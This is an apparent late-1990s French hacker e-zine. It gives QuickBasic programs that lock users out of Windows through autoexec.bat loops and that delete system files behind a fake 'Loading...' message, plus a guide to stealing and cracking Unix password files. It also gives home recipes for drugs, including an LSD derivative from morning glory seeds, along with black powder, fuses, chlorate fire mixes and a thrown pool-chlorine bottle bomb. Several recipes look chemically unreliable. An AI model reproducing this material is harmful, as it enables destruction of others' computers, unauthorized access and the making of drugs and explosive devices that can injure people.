     quand il load. +crivez quelque chose comme "!!!SCHOOL SUCKS!!!"
         
 2 - Faite un programme en QuickBasic de mot de passe, screen saver....
     ex : si le programme se nomme.... allo.exe (en quickbasic que vous avez
          fait.) copier le programme dans c:\windows\system
          Editer le autoexec.bat et aprs la ligne : PROMPT $p$g, marquer :
          c:\windows\system\allo.exe
          comme ca, a chaque fois que l'ordi va s'ouvrir, le programme va
          s'activer avant que Windows load. Si le programme contien une loop,
          l'ordi ne pourra plus s'ouvrir.. heehe..
          Ou bien,  la place, aprs la ligne PROMPT $p$g, marquer
          c:\autoexec.bat comme ca, le autoexec.bat va faire une loop, heehe!

          Voici une source de mot de passe en Quickbasic :

      1 CLS
      REM Fait par endrix
      PRINT "Stit, l'+cole sa SUCE!!! Entre le mot de passe :"
      INPUT pass$
      IF pass$ = "jackass" OR pass$ = "JACKASS" THEN
        CLS
        PRINT "Mmmm.. Bon mot de passe, windows va loader..."
        SLEEP 3
       ELSE
        FOR w = 1 TO 300
         FOR a = 1 TO 15
          COLOR a
          PRINT "Mauvais mot de passe";
         NEXT a
        NEXT w
       GOTO 1
      END IF
 
        L'Utilisateur ne pourra pas entrer dans Windows s'il n'a pas le bon
        mot de passe (qui est : jackass)
        
      Voici un source de graphique qui affiche
      "!!! YoUr CoMpUt3r 1s NoW FuCk3d Up !!!" d'une facon cool :
 
  SCREEN 9
  REM Code par endrix
  BEEP
  BEEP
  DIM PI AS DOUBLE
  PI = 4 * ATN(1)
  text$ = "!!! YoUr CoMpUt3r 1s NoW FuCk3d Up !!!"
   DIM TeXtMaTriX(LEN(text$) * 8, 16) AS INTEGER
  PRINT text$
  FOR y% = 1 TO 16
    FOR i% = 1 TO (LEN(text$) * 8)
     TeXtMaTriX(i%, y%) = POINT(i%, y%)
    NEXT i%
  NEXT y%
  CLS
  cc% = -LEN(text$) * 8
  InC% = 8
  XRaDiuS% = 50
  DO
   SCREEN 9, 0, 1, 0
   CLS
   IF cc% > 640 THEN cc% = -(LEN(text$) * 8)
   cc% = cc% + InC%
   FOR y% = 1 TO 16
     FOR X% = cc% TO cc% + LEN(text$) * 8
       X2% = (SIN((X% * (PI / 180))) * (XRaDiuS%)) + 270
       LINE (X%, (X2% + y%) - 100)-(X%, (X2% + y%) - 100), TeXtMaTriX(X% - cc%, y%), BF
     NEXT X%
   NEXT y%
   SCREEN 9, 0, 0, 0
   PCOPY 1, 0
  LOOP
 


 3 - Vous pouvez juste faire un tit programme qui a comme fonction kill :

  REM  code par endrix
  CLS
   KILL "c:\autoexec.bat"
   KILL "c:\windows\system\*.vxd
   KILL "c:\windows\*.vxd
   KILL "c:\windows\win.com
  PRINT "Loading..."
  SLEEP 2

  ceci supprime les fichier VXD dans system et dans windows, win.com et
  l'autoexec.bat. Ce ordinateur ne s'ouvrira plus !!!




Conclusion : Je suis sur que vous pourez penser a d'autre solution et je vous
             souhaite de ne pas vous faire prendre en faisant ca, oky?!

     
==============================================================================
==============================================================================
==============================================================================

- endrix


===========================================================================
==============================par endrix===================================
          _____ _      _     _           ____           _
         |  ___(_) ___| |__ (_) ___ _ __|  _ \__      _| |
         | |_  | |/ __| '_ \| |/ _ \ '__| |_) \ \ /\ / / |
         |  _| | | (__| | | | |  __/ |  |  __/ \ V  V /| |
         |_|   |_|\___|_| |_|_|\___|_|  |_|     \_/\_/ |_|

===========================================================================
===========================================================================

                             O============O
                            <|Introduction|>
                             O============O


 Bien bonjour, hey oui, j'ai encore crit un ti-quelque chose pour vous. Ce
texte a comme fonction de plus vous renseignez sur les fichiers pwl(password)
Vous montrez ou sont place ces fichiers sur les ftps, comment les decoders..
Ceci sera tres utile si vous voullez commencer a faire du ptit piratage. Du
PTIT j'ai bien dit. Ceci poura ainsi vous montrez, si vous avez un ftp, de 
pouvoir vous protegez contre les attaques de lame qui n'ont rien a faire 
dans la vie que "hacker" des ftp's de Warez et faire un tit deltree /y....

 Pour me rejoindre, je suis sur irc(Undernet) sur les channels suivants : 
#outaouais, #warezfrancais, #pirate, #n0past. Si je suis pas sur une de ces 
places la, cherchez moi pas :)) Euhhmmm.. mon email est le suivant : 
lordendrix@hotmail.com et sur ce site web : http://www.haqch.espace2001.com
Se serait tres grandement aprecier quelques commentaires.... Ok, now lets
rock AND rooolllll !!!!


                         O=====================O
                        <|Les fichiers password|>
                         O=====================O


 Pour le monde qui debuttent : les fichiers passwords contiennent le mot-de
passe mais de maniere crypter. Comme ca l'utilisateur peut pas obtenir le
mot-de-passe amoins qu'il le decrypte de maniere a obtenir un access puissant
qu'un appelle un "super user account". 


Voici un exemple de fichier password :
chare:u7mHuh5R4Umvo:105:100:Chris Hare:/u/chare:/bin/ksh
username:encrypted password:UID:GID:comment:home directory:login shell

Voici une table qui expliquera tout ces signes.....



                        le fichier ect/passdw
======================================================================
    Nom                     Description                 Valeur
======================================================================
  username              Cette place, est pour           chare     
                        entrer le nom d'uti-            rceh 
                        lisateur du systeme.            brb
                        il y en a un pour               markd
                        chaque personne qui
                        se connecte au 
                        serveur.
----------------------------------------------------------------------
 encrypted password     Cette espace contien        u7mHuh5R4Umvo  
                        le mot-de-passe en-         x
                        crypter. Il y en            *
                        a u pour chaque
                        personne qui se con-        NOLOGIN
                        necte au serveur.
----------------------------------------------------------------------
     UID                Cette espace contien       0-60,000
                        l'ordre numrique
                        de la presentation
                        du systeme.
----------------------------------------------------------------------
     GID                Cette espace est re-       0-60,000 
                        serve a la represen-
                        tation de l'entre ou
                        l'utilisateur devrai
                        etre. 
----------------------------------------------------------------------
    comment             Ca, sa contien l'in-       Chris Hare 
                        formation sur l'uti-       Ops manager, x273
                        lisateur. Information
                        personnelle.... # de
                        tel, addresse.....
----------------------------------------------------------------------
 home directory         Cet espace est l'info-     /u/share
                        rmation, a l'entre de      /usr/lib/ppp/ppp-
                        l'utilisateur quel de-     users 
                        vrait etre sont reper-
                        toire d'arrive. 
----------------------------------------------------------------------
  login shell           C'est l'entre qui est       /bin/sh
                        parti a l'entre de l'u-     /bin/csh
                        tisitateur pour qu'il       /bin/ksh
                        puisse bien entrer. Ca      /bin/tcsh
                        peut varier selon les       /usr/lib/uucp/uucio
                        droits de l'utilisateur.    /usr/lib/ppp/ppd
----------------------------------------------------------------------


 Ce n'est pas absolument cette ligne qu'il y aura dans le mot de passe 
encrypter. Mais ce sera probablement semblable. 
Voici quelque dir pout trouver les informations pour hacker un serveur:

/etc/passwd                 Le fichier password
/tcb/auth/files             Le fichier proteger de la database
/etc/auth/systems/ttys      Le terminal de control de la database
/etc/auth/subsystems        Le subsystems proteger
/etc/auth/system/default    Le system de database


 Bon...... Maintenant que vous savez comment prendre un fichier password,
quoi faire avec ???? euhhmm.. c'est une bonne question... Pourquoi pas le
cracker ??? hein ?? C'est une bone idee je pense. Pour le faire, il vous
faudra des programmes. J'ai ici une petite source de Qbasic(sa viens avec
windows les mecs...c:\windows\qbasic.exe) Qui vous permettera de cracker
des simples mot-de-passe encrypter.

CLS
PRINT "-------------------------------------------------------------------"
PRINT "Ce programme a ete fait par endrix.                                "
PRINT "Il a comme fonction de cracker les password code des ftp.          "
PRINT "Pour des commentaires,http://www.haqch.espace2001.com              " PRINT "                      lordendrix@hotmail.com				  "
PRINT "-------------------------------------------------------------------"
INPUT "Mot-de-passe encrypter :"; I$
FOR X = 1 TO 255
 FOR Y = 1 TO LEN(I$)
   Y$ = MID$(I$, Y, 1)
   YA = ASC(Y$)
   n = X XOR YA
  IF n = 32 THEN F = 1
   n$ = n$ + CHR$(n)
 NEXT Y
 IF F THEN PRINT "Mot-de-passe possible :"; n$
  PRINT I$; " 'encrypter' a "; n$:
  n$ = "": F = 0
NEXT X
PRINT "Finitosss!"


 Pour d'autre programme ou plus de renseignement sur les fichiers passwords, 
allez voir ces sites web :

 http://www.warforge.com
 http://www.rootshell.com
 http://endrix.cjb.net
 http://www.antionline.com


                                 O==========O
                                <|Conclusion|>
                                 O==========O


 Bon... J'espere que vous avez aimer ca les dudes et les dudettes !!! Ne faites 
sourtout pas de connerie avec ca la..... :)))) Adios et venez voir le supperbe 
site : Http://www.haqch.espace2001.com 

===========================================================================
===========================================================================

- endrix





COMMENT CR++...DE LA MESA SAPIENTUM BANADINE -- PiXl
inspir de Coaxial Karma (NPC #1)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Avertissement: On es aucunement responsable des effets causs par
la drogue qui suit.

La mesa sapientum banadine (nous l'appellerons banadine), comme sont
nom
l'indique, est faite a base de bananes. Les effets sont a peu-prs les mmes
que pour la marijuana sauf que la quantite fume doit tre de 3 a 4 fois
suprieur et qu'elle provoque des touffement (des: KeHeu! Keheu!...) lors
de l'absorbtion oral.

Le principal avantage de la banadine est qu'elle est lgal. Selon moi, elle
ne vaut pas un bon join achet a un pusher de confiance. Mais a, c'est a
vous de le juger.

Voici donc comment la prparer:

1- Prendre environ 1 kilogramme de pelure de banane

2- Avec un couteau, peler l'intrieur de la banane.

3- Mettre les restants de l'intrieur de la pelure dans un chaudron et,
y ajoutez de l'eau. Faites bouillir de trois (3)  quatre (4) heures.
Le mlange devrait alors tre pateux.

4- Etendre la pte sur un plateau  pizza, et cuire environ vingt (20) 
trente (30) minutes au four. Le produit qui en rsultera devrait alors
tre une poudre noire.

5- Finalement, fmez-la jusqu'a l'obtention du "high" dsir...;-)


'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-




COMMENT CR...(un driv du) LSD-25 -- PiXl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Bon, les kids (je suis mal plac pour parl....mais bon!), je dois vous
avertir que le LSD n'est pas trs bon pour la sant et que c'est mal d'en
prendre...blablabla...Bon, vous tes maintenant averti(e)s...Passons au
choses srieuses:
 Comment en fabriquer dans votre cuisine!..

 Dans le temps (2 ou 3 ans), le LSD tait trs populaire dans les party rave.
A ce que l'on m'a dit, maintenant c'est plutt l'exctasy. Je ne sais pas,
puisque je ne me tiens pas normment dans les raves...
 Plusieurs de mes chums (amis...) m'ont affirm qu'il aimait mieux (et de loin
prendre du LSD dans les party puisque: les yeux ne viennent pas rouge, a
ce consomme vite et sans odeur (pas de troubles) et la dcente d'acide ce
fait mieux avec des chums que tout seul...

Quoi que vous fassiez de cette recette...Un bon conseil, n'abusez-pas!
   Prendre 150 grammes de graines de "Gloire du matin" 
   Dans 130 cc. d'ther de ptrole, laissez tremper pour 2 jours. 
   Filtrer la solution devant un cran filtre. 
   Jetez le liquide et laisser les graines scher. 
   Pour 2 jours, laissez tremper dans 110 cc. d'alcool de bois. 
   Filtrez encore, gardez le liquide et appelez-le "1." 
   Laissez encore trempez les graines dans 110 cc. d'alcool de bois pour 2
jours. 
   Filtrez et jetez les graines (garder le liquide!) 
   Ajoutez ce liquide dans le liquide appel "1." 
   Laissez le liquide sur un plaque a biscuits et laissez vaporer. 
   Quand tout le liquide sera vapor, il ne vous restera qu'une sorte de
gomme jaune. Rcuprez-la et placez-la dans de petite capsule. 
   30 grammes de "Gloire du matin" = 1 trip

 Il est important de mentionner que certaines compagnies ont enduit leurs
graines de "Gloire du matin" avec des produits chimiques qui peuvent tre
poison.
 Ainsi, une bonne chose serait de vrifier auprs de vos fournisseurs!..
 +tant donn que vous fabriquez vous-mme votre LSD, il est
EXTREMEMENT important de calculer la quantit de LSD que
vous allez absorber ou vendre.
 En gnral, 500 a 700 mics. serait une quantit idale puisque qu'elle est
quivalente a un trip d'environ 8 heures. Si vous devez dpasser cette
quantit, non seulement vous gaspillez, mais vous risquer d'entraner des
dommages trs srieux  votre cerveau ou mme de mourir.
 N'oubliez-pas que le LSD est la substance connue pour tre la plus active
sur l'tre humain (ce qui signifie que, une toute petite quantit peut fournir un
trip trs lev...).

-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-
 





LE SAVIEZ-VOUS?.. -- PiXl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Vous trouver pas qu'un titre comme "Le saviez-vous?..." fait quelques peu
Grand magazine. Moi, je trouves a. Ya peut-tre le fait que je viens de me
passer 2 gros bat en ligne (penser pas croche la! remplacez passer par
fumer).
 Ce qui m'amne  vous parler d'une petite drogue relaxe qui a bon got. Il
s' agit bien sr de ce qu'on appelle videment "la peanuts" (je suis pas sur
de l' ortographe).
 H oui!..Cette bonne vieille arachide est une petite drogue trs lgre. En
fait, ce n'est pas l'arachide comme telle, qui est une drogue, mais bien la
petite pelure brune autour d'elle.
 Ca peut paratre surprenant, mais si vous prenez cette "pelure" et que vous
vous roulez un beau petit joint avec, vous allez partir (au sens figurer
bien-sr!..ha!..ces jeunes, faut tout leur expliquer!).
 Personnellement, j'aime bien me prendre un petit joint de peanuts de temps
 autres...(mais c'est toff  allumer!...argh!...). Mais je vous conseille de
rajouter un peu de weed...Vous savez, la peanuts peut faire un trs bon
complment pour ceux qui rajoute du tabac dans leur joint de weed (vous
tes mieux de le prendre pure, mais si vous voulez absolument le mlanger a
quelques chose, voila une solution!)
 Ne vous faites pas d'illusion, la peanuts ne vous emmnera jamais plus loin
que le monde de JIM MORRISON, et mme la...En effet, il faut en
prendre normment pour avoir un bon high. Le seul avantage de la
peanuts, selon moi, c'est qu'elle est pratiquement gratuite (au prix que a
cote...).

 Rappelez-vous: "Fumer de la peanuts, c'est cologique!"

-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-



LE CANNA PUNCH -- Tod
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ingrdients :
  1 litre de rhum blanc agricole
  1 gousse de vanille
  1 racine de gingembre
  100 g d'herbe
  50 g de sucre roux

 Laisser macrer 100 g d'herbe sche dans un demi litre de Rhum blanc
pendant une semaine. Agiter plusieurs fois par jour en veillant  ce que
l'alcool recouvre totalement l'herbe.
 Au bout d'une semaine essorer l'herbe et placer le liquide obtenu dans une
bouteille.
 Mettez  nouveau a macrer l'herbe dans le deuxime demi litre de Rhum
blanc pendant une semaine.

  Faites blanchir des fines tranches de gingembre avec la gousse de vanille
fendue ou coupe en morceaux,  feu trs doux, et avec une noisette de
beurre et un peu d'eau; puis ajouter le sucre roux et tourner continuellement
jusqu' ce que le sucre fonde.
 Verser le contenu de la dernire macration avec l'herbe et  feu moyen
amener jusqu'au bouillonnement.
 Essorer le tout encore chaud et rajouter au premier liquide.
 Laisser dcanter au moins quinze jours.

  Un ou deux CANNA PUNCH  jeun feront de l'effet au bout d'un quart
d'heure environ.

-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-

_Franck

COMMENT FAIRE DU NITRATE DE POTASSIUM?

Le nitrate de potassium est un oxydant des plus utilis dans la fabrication des explosifs lents comme la traditionnelle poudre noire ou poudre a canon,bombe fumigene et d'autres mlanges
explosifs ou oxydants.Le nitrate de potassium est disponible a la pharmacie sous le nom de salpetre et qui coute environ entre 3.00$ a 6.00$ pour 100 grammes.Donc il est bon de la fabriquer soit-meme avec le procd suivant.Mais il faut se procurer quelques lments qu'on ne peut acheter mais qu'on produit soit-meme.


MATRIAUX:

-1 CONTENANT DE 5 GALLONS (20 LITRES)
-2 MORCEAUX DE TISSU TRES FIN
-2 GALLONS D'EAU (8 LITRES)
-CENDRE DE BOIS BIEN TAMIS
-2 GALLONS DE COMPOST FAIT A PARTIR DE VGTAUX BIEN DCOMPOSS


PROCDURES:

-Prendre le contenant,percer un trou de 1 cm de diametre,dposer un des morceaux de tissu dans le fond du contenant.Ajouter 1 cm d'pais de cendre de bois dessus le morceau de tissu
,mettre l'autre morceau de tissu par dessus.
-Mettre les 2 gallons de compost par-dessus le morceau de tissu.
-Verser 2 gallons d'eau bouillante sur le compost et rcuprer la solution qui d'egoute,prendre cette solution et la filtrer.
-Verser la solution dans un contenant pour le faire bouillier,pendant 2 heures.Des petits grains de sel devraient apparaitre,enlevez les quand vous les voyez.
-Quand la solution a perdu la moiti de son volume original,enlevez la du feu.Laissez la reposer pendant 30 minutes.
-Filtrer ensuite la solution.Les petits crystaux restants sont du nitrate de potassium.


IMPORTANT:Le compost doit etre bien dcompos et il se peut que la solution dgage des odeurs.


___________________________________________________________________________

_Franck
Comment fabriquer de la poudre noir(poudre a canon)?

MATRIAUX:

-Nitrate de potassium (en grains)    750 ml
-Charbon de bois (en grains)         500 ml
-Soufre (en grains)                  125 ml
-Alcool a friction                  2500 ml
-Eau                                 750 ml
-Source de chaleur (rond de poil)
-2 seaux de 7500 ml tres rsistant (ex:mtal,cramique)


PROCDURE:

-Place l'alcool dans un seau.
-Place le nitrate de potassium,le charbon de bois et le soufre dans l'autre seau.
Additionne 250 ml d'eau,et agite la solution jusqu'a ce que les ingrdients soient dissous.
-Additionne 500 ml d'eau,et place le seau sur une source de chaleur.Faire chauffer jusqu'a temps qu'il est de petite bulles.

ATTENTION:NE PAS METTRE LA MIXTURE A BUILLITION,SOIT SUR QU'IL RESTE DE L'EAU.

-Enleve la mixture de la source de chaleur et verse la dans l'alcool.Laisse la mixture dans l'alcool pendant 5 minutes.
-Enlever le liquide de la mixture et laisser secher.
___________________________________________________________________________

_Franck

Fabriquation d'une bombe avec du chlore de piscine.


MATRIAUX:

-Bouteille de liqueur 2 litres
-300 ml de chlore de piscine en poudre
-300 ml de lave-vitre pour auto.


PROCDURE:

Verser le lave-vitre dans la bouteille.Plier la bouteille en trois de facon a former un cone dans la partie du haut.Verser le chlore dans le cone.Fermer la bouteille avec le bouchon,agitez pour que les 2 solutions entre en contact et lancer immdiatement.La dflagration est d'environ 30 metres carr.

ATTENTION:IL NE FAUT PAS QUE LES 2 SOLUTIONS ENTRE EN CONTACT AVANT DE FERMER LE BOUCHON.SI VOUS VOYEZ QUE LE FOND DE LA BOUTEILLE DEVIENT CHAUD,LANCER IMMDIATEMENT.

__________________________________________________________________________

_Franck 
Dsignations courantes.

NOM CHIMIQUE                     NOM HABITUEL

-Acide actique                 Vinaigre a 5%
-Acide chlorhydrique            Acide chlorhydrique  (batterie d'auto)
-Alum                           Sulfate d'aluminium
-Bicarbonate de sodium          Petite vache
-Chlorure de sodium             Sel de table
-Graphite                       Mine de crayon
-Hydroxyde d'ammonium           Windex a 20%
-Hypochlorite de sodium         Eau de javel
-Naphtaline                     Boules a mites
-Nitrate de potassium           Salpetre
-Sulfate de calcium             Platre
-Sulfate de magnsium           Sel epsom
-Ttraborate de sodium          Borax
-Zing,mtal                     Zing (pile de batterie)

____________________________________________________________________________

_Franck

Comment faire des meches qui brulent 2 pouces a la minute?

MATERIAUX:

-3 lacets de cotton
-Nitrate de potassium ou chlorate de potassium
-Sucre
-eau chaude

PROCDURE:

Mixer 1 partie de nitrate de potassium ou de chlorate de potassium avec 1 partie de sucre et ensuite avec 2 parties d'eau chaude.Tremper chaques lacets dans la solution,et faire une tresse avec les lacets.


__________________________________________________________________________
_Franck

Comment faire des meches qui brulent 40 pouces par minute?

MATRIAUX:

-Poudre a canon
-3 lacets en cotton
-Farine 
-Eau chaude

PROCDURE:

Mixer 1 partie de farine avec une partie de poudre a canon.Ensuite mixer ce melange avec 2 parties d'eau chaude.tremper les lacets dans cette solution et faire une tresse avec.


________________________________________________________________________
_Franck


Comment faire des feux de diffrentes couleurs?(feux de bengale)

 COULEUR DU FEU    INGRDIENTS                       NOMBRE DE PARTIE

-FEU BLEU:         Chlorate de potassium                        8
                   Sulfure de cuivre                            2
                   Soufre                                       4
                   Chlorure mercureux                           2
                   Oxyde de cuivre                              1
                   Charbon de bois                              1

-FEU VERT :        Nitrate de baryum                           12
                   Chlorate de potassium                        3
                   Soufre                                       2


-FEU BLANC:        Nitrate de potassium                         7
                   Sulfure d'antimoine                          1
                   Soufre                                       1


-FEU ROUGE:        Nitrate de strontium                         4
                   Chlorate de potassium                        4
                   Charbon de bois                              2
                   Soufre                                                        1


-FEU JAUNE:        Chlorate de potassium                        6
                   Oxalate de sodium                            2
                   Charbon de bois                              2
                   Soufre                                                        1


FEU POUDRE:        Sulfate de cuivre                            1
                   Soufre                         		    1	
                   Chlorate de potassium                        1

Bien melanger,et alumer.



____________________________________________________________________________
                   @HAQCH dec 98 tout droits rserves